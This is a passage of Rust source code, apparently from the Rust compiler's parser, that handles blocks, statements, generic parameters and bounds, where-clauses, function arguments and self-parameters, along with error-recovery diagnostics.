// speculative, has been misleading in the past (closed Issue #46836)
Applicability::MaybeIncorrect
);
}
Err(mut e) => {
self.recover_stmt_(SemiColonMode::Break, BlockMode::Ignore);
self.cancel(&mut e);
}
_ => ()
}
e.span_label(sp, "expected `{`");
return Err(e);
}
self.parse_block_tail(lo, BlockCheckMode::Default)
}
/// Parses a block. Inner attributes are allowed.
fn parse_inner_attrs_and_block(&mut self) -> PResult<'a, (Vec<Attribute>, P<Block>)> {
maybe_whole!(self, NtBlock, |x| (Vec::new(), x));
let lo = self.span;
self.expect(&token::OpenDelim(token::Brace))?;
Ok((self.parse_inner_attributes()?,
self.parse_block_tail(lo, BlockCheckMode::Default)?))
}
/// Parses the rest of a block expression or function body.
/// Precondition: already parsed the '{'.
fn parse_block_tail(&mut self, lo: Span, s: BlockCheckMode) -> PResult<'a, P<Block>> {
let mut stmts = vec![];
while !self.eat(&token::CloseDelim(token::Brace)) {
let stmt = match self.parse_full_stmt(false) {
Err(mut err) => {
err.emit();
self.recover_stmt_(SemiColonMode::Ignore, BlockMode::Ignore);
Some(Stmt {
id: ast::DUMMY_NODE_ID,
node: StmtKind::Expr(DummyResult::raw_expr(self.span, true)),
span: self.span,
})
}
Ok(stmt) => stmt,
};
if let Some(stmt) = stmt {
stmts.push(stmt);
} else if self.token == token::Eof {
break;
} else {
// Found only `;` or `}`.
continue;
};
}
Ok(P(ast::Block {
stmts,
id: ast::DUMMY_NODE_ID,
rules: s,
span: lo.to(self.prev_span),
}))
}
/// Parses a statement, including the trailing semicolon.
crate fn parse_full_stmt(&mut self, macro_legacy_warnings: bool) -> PResult<'a, Option<Stmt>> {
// skip looking for a trailing semicolon when we have an interpolated statement
maybe_whole!(self, NtStmt, |x| Some(x));
let mut stmt = match self.parse_stmt_without_recovery(macro_legacy_warnings)? {
Some(stmt) => stmt,
None => return Ok(None),
};
match stmt.node {
StmtKind::Expr(ref expr) if self.token != token::Eof => {
// expression without semicolon
if classify::expr_requires_semi_to_be_stmt(expr) {
// Just check for errors and recover; do not eat semicolon yet.
if let Err(mut e) =
self.expect_one_of(&[], &[token::Semi, token::CloseDelim(token::Brace)])
{
e.emit();
self.recover_stmt();
}
}
}
StmtKind::Local(..) => {
// We used to incorrectly allow a macro-expanded let statement to lack a semicolon.
if macro_legacy_warnings && self.token != token::Semi {
self.warn_missing_semicolon();
} else {
self.expect_one_of(&[], &[token::Semi])?;
}
}
_ => {}
}
if self.eat(&token::Semi) {
stmt = stmt.add_trailing_semicolon();
}
stmt.span = stmt.span.with_hi(self.prev_span.hi());
Ok(Some(stmt))
}
fn warn_missing_semicolon(&self) {
self.diagnostic().struct_span_warn(self.span, {
&format!("expected `;`, found {}", self.this_token_descr())
}).note({
"This was erroneously allowed and will become a hard error in a future release"
}).emit();
}
fn err_dotdotdot_syntax(&self, span: Span) {
self.diagnostic().struct_span_err(span, {
"unexpected token: `...`"
}).span_suggestion(
span, "use `..` for an exclusive range", "..".to_owned(),
Applicability::MaybeIncorrect
).span_suggestion(
span, "or `..=` for an inclusive range", "..=".to_owned(),
Applicability::MaybeIncorrect
).emit();
}
/// Parses bounds of a type parameter `BOUND + BOUND + ...`, possibly with trailing `+`.
///
/// ```
/// BOUND = TY_BOUND | LT_BOUND
/// LT_BOUND = LIFETIME (e.g., `'a`)
/// TY_BOUND = TY_BOUND_NOPAREN | (TY_BOUND_NOPAREN)
/// TY_BOUND_NOPAREN = [?] [for<LT_PARAM_DEFS>] SIMPLE_PATH (e.g., `?for<'a: 'b> m::Trait<'a>`)
/// ```
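///
/// For example, this accepts the bound list in `T: 'a + ?Sized + Send`
/// or `T: for<'b> Fn(&'b u8)` (illustrative inputs).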
fn parse_generic_bounds_common(&mut self,
allow_plus: bool,
colon_span: Option<Span>) -> PResult<'a, GenericBounds> {
let mut bounds = Vec::new();
let mut negative_bounds = Vec::new();
let mut last_plus_span = None;
let mut was_negative = false;
loop {
// This needs to be synchronized with `Token::can_begin_bound`.
let is_bound_start = self.check_path() || self.check_lifetime() ||
self.check(&token::Not) || // used for error reporting only
self.check(&token::Question) ||
self.check_keyword(kw::For) ||
self.check(&token::OpenDelim(token::Paren));
if is_bound_start {
let lo = self.span;
let has_parens = self.eat(&token::OpenDelim(token::Paren));
let inner_lo = self.span;
let is_negative = self.eat(&token::Not);
let question = if self.eat(&token::Question) { Some(self.prev_span) } else { None };
if self.token.is_lifetime() {
if let Some(question_span) = question {
self.span_err(question_span,
"`?` may only modify trait bounds, not lifetime bounds");
}
bounds.push(GenericBound::Outlives(self.expect_lifetime()));
if has_parens {
let inner_span = inner_lo.to(self.prev_span);
self.expect(&token::CloseDelim(token::Paren))?;
let mut err = self.struct_span_err(
lo.to(self.prev_span),
"parenthesized lifetime bounds are not supported"
);
if let Ok(snippet) = self.sess.source_map().span_to_snippet(inner_span) {
err.span_suggestion_short(
lo.to(self.prev_span),
"remove the parentheses",
snippet.to_owned(),
Applicability::MachineApplicable
);
}
err.emit();
}
} else {
let lifetime_defs = self.parse_late_bound_lifetime_defs()?;
let path = self.parse_path(PathStyle::Type)?;
if has_parens {
self.expect(&token::CloseDelim(token::Paren))?;
}
let poly_span = lo.to(self.prev_span);
if is_negative {
was_negative = true;
if let Some(sp) = last_plus_span.or(colon_span) {
negative_bounds.push(sp.to(poly_span));
}
} else {
let poly_trait = PolyTraitRef::new(lifetime_defs, path, poly_span);
let modifier = if question.is_some() {
TraitBoundModifier::Maybe
} else {
TraitBoundModifier::None
};
bounds.push(GenericBound::Trait(poly_trait, modifier));
}
}
} else {
break
}
if !allow_plus || !self.eat_plus() {
break
} else {
last_plus_span = Some(self.prev_span);
}
}
if !negative_bounds.is_empty() || was_negative {
let plural = negative_bounds.len() > 1;
let last_span = negative_bounds.last().map(|sp| *sp);
let mut err = self.struct_span_err(
negative_bounds,
"negative trait bounds are not supported",
);
if let Some(sp) = last_span {
err.span_label(sp, "negative trait bounds are not supported");
}
if let Some(bound_list) = colon_span {
let bound_list = bound_list.to(self.prev_span);
let mut new_bound_list = String::new();
if !bounds.is_empty() {
let mut snippets = bounds.iter().map(|bound| bound.span())
.map(|span| self.sess.source_map().span_to_snippet(span));
while let Some(Ok(snippet)) = snippets.next() {
new_bound_list.push_str(" + ");
new_bound_list.push_str(&snippet);
}
new_bound_list = new_bound_list.replacen(" +", ":", 1);
}
err.span_suggestion_hidden(
bound_list,
&format!("remove the trait bound{}", if plural { "s" } else { "" }),
new_bound_list,
Applicability::MachineApplicable,
);
}
err.emit();
}
return Ok(bounds);
}
crate fn parse_generic_bounds(&mut self,
colon_span: Option<Span>) -> PResult<'a, GenericBounds> {
self.parse_generic_bounds_common(true, colon_span)
}
/// Parses bounds of a lifetime parameter `BOUND + BOUND + BOUND`, possibly with trailing `+`.
///
/// ```
/// BOUND = LT_BOUND (e.g., `'a`)
/// ```
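///
/// For example, this accepts the `'b + 'c` in `'a: 'b + 'c` (illustrative);
/// the `'a` and the colon have already been eaten by the caller.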
fn parse_lt_param_bounds(&mut self) -> GenericBounds {
let mut lifetimes = Vec::new();
while self.check_lifetime() {
lifetimes.push(ast::GenericBound::Outlives(self.expect_lifetime()));
if !self.eat_plus() {
break
}
}
lifetimes
}
/// Matches `typaram = IDENT (`?` unbound)? optbounds ( EQ ty )?`.
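///
/// For example: `T`, `T: Clone + Default`, or `T: Clone = Vec<u8>`
/// (illustrative type parameter declarations).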
fn parse_ty_param(&mut self,
preceding_attrs: Vec<Attribute>)
-> PResult<'a, GenericParam> {
let ident = self.parse_ident()?;
// Parse optional colon and param bounds.
let bounds = if self.eat(&token::Colon) {
self.parse_generic_bounds(Some(self.prev_span))?
} else {
Vec::new()
};
let default = if self.eat(&token::Eq) {
Some(self.parse_ty()?)
} else {
None
};
Ok(GenericParam {
ident,
id: ast::DUMMY_NODE_ID,
attrs: preceding_attrs.into(),
bounds,
kind: GenericParamKind::Type {
default,
}
})
}
/// Parses the following grammar:
///
/// TraitItemAssocTy = Ident ["<"...">"] [":" [GenericBounds]] ["where" ...] ["=" Ty]
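///
/// For example, the `Item: Clone = u32;` part of `type Item: Clone = u32;`
/// (illustrative); the `type` keyword has already been eaten by the caller.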
fn parse_trait_item_assoc_ty(&mut self)
-> PResult<'a, (Ident, TraitItemKind, ast::Generics)> {
let ident = self.parse_ident()?;
let mut generics = self.parse_generics()?;
// Parse optional colon and param bounds.
let bounds = if self.eat(&token::Colon) {
self.parse_generic_bounds(None)?
} else {
Vec::new()
};
generics.where_clause = self.parse_where_clause()?;
let default = if self.eat(&token::Eq) {
Some(self.parse_ty()?)
} else {
None
};
self.expect(&token::Semi)?;
Ok((ident, TraitItemKind::Type(bounds, default), generics))
}
fn parse_const_param(&mut self, preceding_attrs: Vec<Attribute>) -> PResult<'a, GenericParam> {
self.expect_keyword(kw::Const)?;
let ident = self.parse_ident()?;
self.expect(&token::Colon)?;
let ty = self.parse_ty()?;
Ok(GenericParam {
ident,
id: ast::DUMMY_NODE_ID,
attrs: preceding_attrs.into(),
bounds: Vec::new(),
kind: GenericParamKind::Const {
ty,
}
})
}
/// Parses a (possibly empty) list of lifetime and type parameters, possibly including
/// a trailing comma and erroneous trailing attributes.
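///
/// For example: `'a, 'b: 'a, const N: usize, T: Clone = u32` (illustrative);
/// the surrounding angle brackets are handled by the caller.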
crate fn parse_generic_params(&mut self) -> PResult<'a, Vec<ast::GenericParam>> {
let mut params = Vec::new();
loop {
let attrs = self.parse_outer_attributes()?;
if self.check_lifetime() {
let lifetime = self.expect_lifetime();
// Parse lifetime parameter.
let bounds = if self.eat(&token::Colon) {
self.parse_lt_param_bounds()
} else {
Vec::new()
};
params.push(ast::GenericParam {
ident: lifetime.ident,
id: lifetime.id,
attrs: attrs.into(),
bounds,
kind: ast::GenericParamKind::Lifetime,
});
} else if self.check_keyword(kw::Const) {
// Parse const parameter.
params.push(self.parse_const_param(attrs)?);
} else if self.check_ident() {
// Parse type parameter.
params.push(self.parse_ty_param(attrs)?);
} else {
// Check for trailing attributes and stop parsing.
if !attrs.is_empty() {
if !params.is_empty() {
self.struct_span_err(
attrs[0].span,
&format!("trailing attribute after generic parameter"),
)
.span_label(attrs[0].span, "attributes must go before parameters")
.emit();
} else {
self.struct_span_err(
attrs[0].span,
&format!("attribute without generic parameters"),
)
.span_label(
attrs[0].span,
"attributes are only permitted when preceding parameters",
)
.emit();
}
}
break
}
if !self.eat(&token::Comma) {
break
}
}
Ok(params)
}
/// Parses a set of optional generic type parameter declarations. Where
/// clauses are not parsed here, and must be added later via
/// `parse_where_clause()`.
///
/// matches generics = ( ) | ( < > ) | ( < typaramseq ( , )? > ) | ( < lifetimes ( , )? > )
/// | ( < lifetimes , typaramseq ( , )? > )
/// where typaramseq = ( typaram ) | ( typaram , typaramseq )
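///
/// For example: `<>`, `<'a>`, `<'a, T>`, or `<T: Clone>` (illustrative),
/// as well as no generics at all.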
fn parse_generics(&mut self) -> PResult<'a, ast::Generics> {
let span_lo = self.span;
let (params, span) = if self.eat_lt() {
let params = self.parse_generic_params()?;
self.expect_gt()?;
(params, span_lo.to(self.prev_span))
} else {
(vec![], self.prev_span.between(self.span))
};
Ok(ast::Generics {
params,
where_clause: WhereClause {
id: ast::DUMMY_NODE_ID,
predicates: Vec::new(),
span: DUMMY_SP,
},
span,
})
}
/// Parses generic args (within a path segment) with recovery for extra leading angle brackets.
/// For the purposes of understanding the parsing logic of generic arguments, this function
/// can be thought of being the same as just calling `self.parse_generic_args()` if the source
/// had the correct amount of leading angle brackets.
///
/// ```ignore (diagnostics)
/// bar::<<<<T as Foo>::Output>();
/// ^^ help: remove extra angle brackets
/// ```
fn parse_generic_args_with_leading_angle_bracket_recovery(
&mut self,
style: PathStyle,
lo: Span,
) -> PResult<'a, (Vec<GenericArg>, Vec<AssocTyConstraint>)> {
// We need to detect whether there are extra leading left angle brackets and produce an
// appropriate error and suggestion. This cannot be implemented by looking ahead at
// upcoming tokens for a matching `>` character - if there are unmatched `<` tokens
// then there won't be matching `>` tokens to find.
//
// To explain how this detection works, consider the following example:
//
// ```ignore (diagnostics)
// bar::<<<<T as Foo>::Output>();
// ^^ help: remove extra angle brackets
// ```
//
// Parsing of the left angle brackets starts in this function. We start by parsing the
// `<` token (incrementing the counter of unmatched angle brackets on `Parser` via
// `eat_lt`):
//
// *Upcoming tokens:* `<<<<T as Foo>::Output>;`
// *Unmatched count:* 1
// *`parse_path_segment` calls deep:* 0
//
// This has the effect of recursing as this function is called if a `<` character
// is found within the expected generic arguments:
//
// *Upcoming tokens:* `<<<T as Foo>::Output>;`
// *Unmatched count:* 2
// *`parse_path_segment` calls deep:* 1
//
// Eventually we will have recursed until having consumed all of the `<` tokens and
// this will be reflected in the count:
//
// *Upcoming tokens:* `T as Foo>::Output>;`
// *Unmatched count:* 4
// *`parse_path_segment` calls deep:* 3
//
// The parser will continue until reaching the first `>` - this will decrement the
// unmatched angle bracket count and return to the parent invocation of this function
// having succeeded in parsing:
//
// *Upcoming tokens:* `::Output>;`
// *Unmatched count:* 3
// *`parse_path_segment` calls deep:* 2
//
// This will continue until the next `>` character which will also return successfully
// to the parent invocation of this function and decrement the count:
//
// *Upcoming tokens:* `;`
// *Unmatched count:* 2
// *`parse_path_segment` calls deep:* 1
//
// At this point, this function will expect to find another matching `>` character but
// won't be able to and will return an error. This will continue all the way up the
// call stack until the first invocation:
//
// *Upcoming tokens:* `;`
// *Unmatched count:* 2
// *`parse_path_segment` calls deep:* 0
//
// In doing this, we have managed to work out how many unmatched leading left angle
// brackets there are, but we cannot recover as the unmatched angle brackets have
// already been consumed. To remedy this, we keep a snapshot of the parser state
// before we do the above. We can then inspect whether we ended up with a parsing error
// and unmatched left angle brackets and if so, restore the parser state before we
// consumed any `<` characters to emit an error and consume the erroneous tokens to
// recover by attempting to parse again.
//
// In practice, the recursion of this function is indirect and there will be other
// locations that consume some `<` characters - as long as we update the count when
// this happens, it isn't an issue.
let is_first_invocation = style == PathStyle::Expr;
// Take a snapshot before attempting to parse - we can restore this later.
let snapshot = if is_first_invocation {
Some(self.clone())
} else {
None
};
debug!("parse_generic_args_with_leading_angle_bracket_recovery: (snapshotting)");
match self.parse_generic_args() {
Ok(value) => Ok(value),
Err(ref mut e) if is_first_invocation && self.unmatched_angle_bracket_count > 0 => {
// Cancel error from being unable to find `>`. We know the error
// must have been this due to a non-zero unmatched angle bracket
// count.
e.cancel();
// Swap `self` with our backup of the parser state before attempting to parse
// generic arguments.
let snapshot = mem::replace(self, snapshot.unwrap());
debug!(
"parse_generic_args_with_leading_angle_bracket_recovery: (snapshot failure) \
snapshot.count={:?}",
snapshot.unmatched_angle_bracket_count,
);
// Eat the unmatched angle brackets.
for _ in 0..snapshot.unmatched_angle_bracket_count {
self.eat_lt();
}
// Make a span over ${unmatched angle bracket count} characters.
let span = lo.with_hi(
lo.lo() + BytePos(snapshot.unmatched_angle_bracket_count)
);
let plural = snapshot.unmatched_angle_bracket_count > 1;
self.diagnostic()
.struct_span_err(
span,
&format!(
"unmatched angle bracket{}",
if plural { "s" } else { "" }
),
)
.span_suggestion(
span,
&format!(
"remove extra angle bracket{}",
if plural { "s" } else { "" }
),
String::new(),
Applicability::MachineApplicable,
)
.emit();
// Try again without unmatched angle bracket characters.
self.parse_generic_args()
},
Err(e) => Err(e),
}
}
/// Parses a (possibly empty) list of lifetime and type arguments and associated type
/// bindings, possibly including a trailing comma.
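///
/// For example, the `'a, u32, Item = u8` in `Foo<'a, u32, Item = u8>`
/// (illustrative); the angle brackets themselves are parsed elsewhere.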
fn parse_generic_args(&mut self) -> PResult<'a, (Vec<GenericArg>, Vec<AssocTyConstraint>)> {
let mut args = Vec::new();
let mut constraints = Vec::new();
let mut misplaced_assoc_ty_constraints: Vec<Span> = Vec::new();
let mut assoc_ty_constraints: Vec<Span> = Vec::new();
let args_lo = self.span;
loop {
if self.check_lifetime() && self.look_ahead(1, |t| !t.is_like_plus()) {
// Parse lifetime argument.
args.push(GenericArg::Lifetime(self.expect_lifetime()));
misplaced_assoc_ty_constraints.append(&mut assoc_ty_constraints);
} else if self.check_ident() && self.look_ahead(1,
|t| t == &token::Eq || t == &token::Colon) {
// Parse associated type constraint.
let lo = self.span;
let ident = self.parse_ident()?;
let kind = if self.eat(&token::Eq) {
AssocTyConstraintKind::Equality {
ty: self.parse_ty()?,
}
} else if self.eat(&token::Colon) {
AssocTyConstraintKind::Bound {
bounds: self.parse_generic_bounds(Some(self.prev_span))?,
}
} else {
unreachable!();
};
let span = lo.to(self.prev_span);
constraints.push(AssocTyConstraint {
id: ast::DUMMY_NODE_ID,
ident,
kind,
span,
});
assoc_ty_constraints.push(span);
} else if self.check_const_arg() {
// Parse const argument.
let expr = if let token::OpenDelim(token::Brace) = self.token {
self.parse_block_expr(None, self.span, BlockCheckMode::Default, ThinVec::new())?
} else if self.token.is_ident() {
// FIXME(const_generics): to distinguish between idents for types and consts,
// we should introduce a GenericArg::Ident in the AST and distinguish when
// lowering to the HIR. For now, idents for const args are not permitted.
if self.token.is_keyword(kw::True) || self.token.is_keyword(kw::False) {
self.parse_literal_maybe_minus()?
} else {
return Err(
self.fatal("identifiers may currently not be used for const generics")
);
}
} else {
self.parse_literal_maybe_minus()?
};
let value = AnonConst {
id: ast::DUMMY_NODE_ID,
value: expr,
};
args.push(GenericArg::Const(value));
misplaced_assoc_ty_constraints.append(&mut assoc_ty_constraints);
} else if self.check_type() {
// Parse type argument.
args.push(GenericArg::Type(self.parse_ty()?));
misplaced_assoc_ty_constraints.append(&mut assoc_ty_constraints);
} else {
break
}
if !self.eat(&token::Comma) {
break
}
}
// FIXME: we would like to report this in ast_validation instead, but we currently do not
// preserve ordering of generic parameters with respect to associated type binding, so we
// lose that information after parsing.
if !misplaced_assoc_ty_constraints.is_empty() {
let mut err = self.struct_span_err(
args_lo.to(self.prev_span),
"associated type bindings must be declared after generic parameters",
);
for span in misplaced_assoc_ty_constraints {
err.span_label(
span,
"this associated type binding should be moved after the generic parameters",
);
}
err.emit();
}
Ok((args, constraints))
}
/// Parses an optional where-clause and places it in `generics`.
///
/// ```ignore (only-for-syntax-highlight)
/// where T : Trait<U, V> + 'b, 'a : 'b
/// ```
fn parse_where_clause(&mut self) -> PResult<'a, WhereClause> {
let mut where_clause = WhereClause {
id: ast::DUMMY_NODE_ID,
predicates: Vec::new(),
span: self.prev_span.to(self.prev_span),
};
if !self.eat_keyword(kw::Where) {
return Ok(where_clause);
}
let lo = self.prev_span;
// We are considering adding generics to the `where` keyword as an alternative higher-rank
// parameter syntax (as in `where<'a>` or `where<T>`). To avoid that being a breaking
// change, we parse those generics now, but report an error.
if self.choose_generics_over_qpath() {
let generics = self.parse_generics()?;
self.struct_span_err(
generics.span,
"generic parameters on `where` clauses are reserved for future use",
)
.span_label(generics.span, "currently unsupported")
.emit();
}
loop {
let lo = self.span;
if self.check_lifetime() && self.look_ahead(1, |t| !t.is_like_plus()) {
let lifetime = self.expect_lifetime();
// Bounds starting with a colon are mandatory, but possibly empty.
self.expect(&token::Colon)?;
let bounds = self.parse_lt_param_bounds();
where_clause.predicates.push(ast::WherePredicate::RegionPredicate(
ast::WhereRegionPredicate {
span: lo.to(self.prev_span),
lifetime,
bounds,
}
));
} else if self.check_type() {
// Parse optional `for<'a, 'b>`.
// This `for` is parsed greedily and applies to the whole predicate,
// the bounded type can have its own `for` applying only to it.
// Examples:
// * `for<'a> Trait1<'a>: Trait2<'a /* ok */>`
// * `(for<'a> Trait1<'a>): Trait2<'a /* not ok */>`
// * `for<'a> for<'b> Trait1<'a, 'b>: Trait2<'a /* ok */, 'b /* not ok */>`
let lifetime_defs = self.parse_late_bound_lifetime_defs()?;
// Parse type with mandatory colon and (possibly empty) bounds,
// or with mandatory equality sign and the second type.
let ty = self.parse_ty()?;
if self.eat(&token::Colon) {
let bounds = self.parse_generic_bounds(Some(self.prev_span))?;
where_clause.predicates.push(ast::WherePredicate::BoundPredicate(
ast::WhereBoundPredicate {
span: lo.to(self.prev_span),
bound_generic_params: lifetime_defs,
bounded_ty: ty,
bounds,
}
));
// FIXME: Decide what should be used here, `=` or `==`.
// FIXME: We are just dropping the binders in lifetime_defs on the floor here.
} else if self.eat(&token::Eq) || self.eat(&token::EqEq) {
let rhs_ty = self.parse_ty()?;
where_clause.predicates.push(ast::WherePredicate::EqPredicate(
ast::WhereEqPredicate {
span: lo.to(self.prev_span),
lhs_ty: ty,
rhs_ty,
id: ast::DUMMY_NODE_ID,
}
));
} else {
return self.unexpected();
}
} else {
break
}
if !self.eat(&token::Comma) {
break
}
}
where_clause.span = lo.to(self.prev_span);
Ok(where_clause)
}
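/// Parses the parenthesized argument list of a function declaration, e.g.
/// `(x: u32, y: &str)` (illustrative), returning the arguments and whether a
/// C-variadic `...` was encountered.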
fn parse_fn_args(&mut self, named_args: bool, allow_c_variadic: bool)
-> PResult<'a, (Vec<Arg> , bool)> {
self.expect(&token::OpenDelim(token::Paren))?;
let sp = self.span;
let mut c_variadic = false;
let (args, recovered): (Vec<Option<Arg>>, bool) =
self.parse_seq_to_before_end(
&token::CloseDelim(token::Paren),
SeqSep::trailing_allowed(token::Comma),
|p| {
// If the argument is a C-variadic argument we should not
// enforce named arguments.
let enforce_named_args = if p.token == token::DotDotDot {
false
} else {
named_args
};
match p.parse_arg_general(enforce_named_args, false,
allow_c_variadic) {
Ok(arg) => {
if let TyKind::CVarArgs = arg.ty.node {
c_variadic = true;
if p.token != token::CloseDelim(token::Paren) {
let span = p.span;
p.span_err(span,
"`...` must be the last argument of a C-variadic function");
Ok(None)
} else {
Ok(Some(arg))
}
} else {
Ok(Some(arg))
}
},
Err(mut e) => {
e.emit();
let lo = p.prev_span;
// Skip every token until next possible arg or end.
p.eat_to_tokens(&[&token::Comma, &token::CloseDelim(token::Paren)]);
// Create a placeholder argument for proper arg count (issue #34264).
let span = lo.to(p.prev_span);
Ok(Some(dummy_arg(Ident::new(kw::Invalid, span))))
}
}
}
)?;
if !recovered {
self.eat(&token::CloseDelim(token::Paren));
}
let args: Vec<_> = args.into_iter().filter_map(|x| x).collect();
if c_variadic && args.is_empty() {
self.span_err(sp,
"C-variadic function must be declared with at least one named argument");
}
Ok((args, c_variadic))
}
/// Parses the argument list and result type of a function declaration.
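///
/// For example: `(x: u32, y: &str) -> bool` (illustrative).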
fn parse_fn_decl(&mut self, allow_c_variadic: bool) -> PResult<'a, P<FnDecl>> {
let (args, c_variadic) = self.parse_fn_args(true, allow_c_variadic)?;
let ret_ty = self.parse_ret_ty(true)?;
Ok(P(FnDecl {
inputs: args,
output: ret_ty,
c_variadic,
}))
}
/// Returns the parsed optional `self` argument, if any.
fn parse_self_arg(&mut self) -> PResult<'a, Option<Arg>> {
let expect_ident = |this: &mut Self| match this.token {
// Preserve hygienic context.
token::Ident(ident, _) =>
{ let span = this.span; this.bump(); Ident::new(ident.name, span) }
_ => unreachable!()
};
let isolated_self = |this: &mut Self, n| {
this.look_ahead(n, |t| t.is_keyword(kw::SelfLower)) &&
this.look_ahead(n + 1, |t| t != &token::ModSep)
};
// Parse optional `self` parameter of a method.
// Only a limited set of initial token sequences is considered `self` parameters; anything
// else is parsed as a normal function parameter list, so some lookahead is required.
let eself_lo = self.span;
let (eself, eself_ident, eself_hi) = match self.token {
token::BinOp(token::And) => {
// `&self`
// `&mut self`
// `&'lt self`
// `&'lt mut self`
// `&not_self`
(if isolated_self(self, 1) {
self.bump();
SelfKind::Region(None, Mutability::Immutable)
} else if self.is_keyword_ahead(1, &[kw::Mut]) &&
isolated_self(self, 2) {
self.bump();
self.bump();
SelfKind::Region(None, Mutability::Mutable)
} else if self.look_ahead(1, |t| t.is_lifetime()) &&
isolated_self(self, 2) {
self.bump();
let lt = self.expect_lifetime();
SelfKind::Region(Some(lt), Mutability::Immutable)
} else if self.look_ahead(1, |t| t.is_lifetime()) &&
self.is_keyword_ahead(2, &[kw::Mut]) &&
isolated_self(self, 3) {
self.bump();
let lt = self.expect_lifetime();
self.bump();
SelfKind::Region(Some(lt), Mutability::Mutable)
} else {
return Ok(None);
}, expect_ident(self), self.prev_span)
}
token::BinOp(token::Star) => {
// `*self`
// `*const self`
// `*mut self`
// `*not_self`
// Emit special error for `self` cases.
let msg = "cannot pass `self` by raw pointer";
(if isolated_self(self, 1) {
self.bump();
self.struct_span_err(self.span, msg)
.span_label(self.span, msg)
.emit();
SelfKind::Value(Mutability::Immutable)
} else if self.look_ahead(1, |t| t.is_mutability()) &&
isolated_self(self, 2) {
self.bump();
self.bump();
self.struct_span_err(self.span, msg)
.span_label(self.span, msg)
.emit();
SelfKind::Value(Mutability::Immutable)
} else {
return Ok(None);
}, expect_ident(self), self.prev_span)
}
token::Ident(..) => {
if isolated_self(self, 0) {
// `self`
// `self: TYPE`
let eself_ident = expect_ident(self);
let eself_hi = self.prev_span;
(if self.eat(&token::Colon) {
let ty = self.parse_ty()?;
SelfKind::Explicit(ty, Mutability::Immutable)
} else {
SelfKind::Value(Mutability::Immutable)
}, eself_ident, eself_hi)
} else if self.token.is_keyword(kw::Mut) &&
isolated_self(self, 1) {
// `mut self`
// `mut self: TYPE`
self.bump();
let eself_ident = expect_ident(self);
let eself_hi = self.prev_span;
(if self.eat(&token::Colon) {
let ty = self.parse_ty()?;
SelfKind::Explicit(ty, Mutability::Mutable)
} else {
SelfKind::Value(Mutability::Mutable)
}, eself_ident, eself_hi)
} else {
return Ok(None);
}
}
_ => return Ok(None),
};
let eself = source_map::respan(eself_lo.to(eself_hi), eself);
Ok(Some(Arg::from_self(eself, eself_ident)))
}
/// Parses the parameter list and result type of a function that may have a `self` parameter.
fn parse_fn_decl_with_self<F>(&mut self, parse_arg_fn: F) -> PResult<'a, P<FnDecl>>
where F: FnMut(&mut Parser<'a>) -> PResult<'a, Arg>,
{
self.expect(&token::OpenDelim(token::Paren))?;
// Parse optional self argument.
let self_arg = self.parse_self_arg()?;
// Parse the rest of the function parameter list.
let sep = SeqSep::trailing_allowed(token::Comma);
let (mut fn_inputs, recovered) = if let Some(self_arg) = self_arg {
if self.check(&token::CloseDelim(token::Paren)) {
(vec![self_arg], false)
} else if self.eat(&token::Comma) {
let mut fn_inputs = vec![self_arg];
let (mut input, recovered) = self.parse_seq_to_before_end(
&token::CloseDelim(token::Paren), sep, parse_arg_fn)?;
fn_inputs.append(&mut input);
(fn_inputs, recovered)
} else {
match self.expect_one_of(&[], &[]) {
Err(err) => return Err(err),
Ok(recovered) => (vec![self_arg], recovered),
}
}
} else {
self.parse_seq_to_before_end(&token::CloseDelim(token::Paren), sep, parse_arg_fn)?
};
if !recovered {
// Parse closing paren and return type.
self.expect(&token::CloseDelim(token::Paren))?;
}
// Replace duplicated recovered arguments with `_` pattern to avoid unnecessary errors.
self.deduplicate_recovered_arg_names(&mut fn_inputs);
Ok(P(FnDecl {
inputs: fn_inputs,
output: self.parse_ret_ty(true)?,
c_variadic: false
}))
}
/// Parses the `|arg, arg|` header of a closure.
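///
/// For example: `||`, `|x, y: u32|`, or `|x| -> u8` (illustrative); a closure
/// with an explicit return type must then have a block body.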
fn parse_fn_block_decl(&mut self) -> PResult<'a, P<FnDecl>> {
let inputs_captures = {
if self.eat(&token::OrOr) {
Vec::new()
} else {
self.expect(&token::BinOp(token::Or))?;
let args = self.parse_seq_to_before_tokens(
&[&token::BinOp(token::Or), &token::OrOr],
SeqSep::trailing_allowed(token::Comma),
TokenExpectType::NoExpect,
|p| p.parse_fn_block_arg()
)?.0;
self.expect_or()?;
args
}
};
let output = self.parse_ret_ty(true)?;
Ok(P(FnDecl {
inputs: inputs_captures,
output,
c_variadic: false
}))
}
/// Parses the name and optional generic types of a function header.
fn parse_fn_header(&mut self) -> PResult<'a, (Ident, ast::Generics)> {
let id = self.parse_ident()?;
let generics = self.parse_generics()?;
Ok((id, generics))
}
fn mk_item(&self, span: Span, ident: Ident, node: ItemKind, vis: Visibility,
attrs: Vec<Attribute>) -> P<Item> {
P(Item {
ident,
attrs,
id: ast::DUMMY_NODE_ID,
node,
vis,
span,
tokens: None,
})
}
/// Parses an item-position function declaration.
fn parse_item_fn(&mut self,
unsafety: Unsafety,
asyncness: Spanned<IsAsync>,
constness: Spanned<Constness>,
abi: Abi)
-> PResult<'a, ItemInfo> {
let (ident, mut generics) = self.parse_fn_header()?;
let allow_c_variadic = abi == Abi::C && unsafety == Unsafety::Unsafe;
let decl = self.parse_fn_decl(allow_c_variadic)?;
generics.where_clause = self.parse_where_clause()?;
let (inner_attrs, body) = self.parse_inner_attrs_and_block()?;
let header = FnHeader { unsafety, asyncness, constness, abi };
Ok((ident, ItemKind::Fn(decl, header, generics, body), Some(inner_attrs)))
}
/// Returns `true` if we are looking at `const ID`
/// (returns `false` for things like `const fn`, etc.).
fn is_const_item(&self) -> bool {
self.token.is_keyword(kw::Const) &&
!self.is_keyword_ahead(1, &[kw::Fn, kw::Unsafe])
}
/// Parses all the "front matter" for a `fn` declaration, up to
/// and including the `fn` keyword:
///
/// - `const fn`
/// - `unsafe fn`
/// - `const unsafe fn`
/// - `extern fn`
/// - etc.
fn parse_fn_front_matter(&mut self)
-> PResult<'a, (
Spanned<Constness>,
Unsafety,
Spanned<IsAsync>,
Abi
)>
{
let is_const_fn = self.eat_keyword(kw::Const);
let const_span = self.prev_span;
let unsafety = self.parse_unsafety();
let asyncness = self.parse_asyncness();
let asyncness = respan(self.prev_span, asyncness);
let (constness, unsafety, abi) = if is_const_fn {
(respan(const_span, Constness::Const), unsafety, Abi::Rust)
} else {
let abi = if self.eat_keyword(kw::Extern) {
self.parse_opt_abi()?.unwrap_or(Abi::C)
} else {
Abi::Rust
};
(respan(self.prev_span, Constness::NotConst), unsafety, abi)
};
if !self.eat_keyword(kw::Fn) {
// It is possible for `expect_one_of` to recover given the contents of
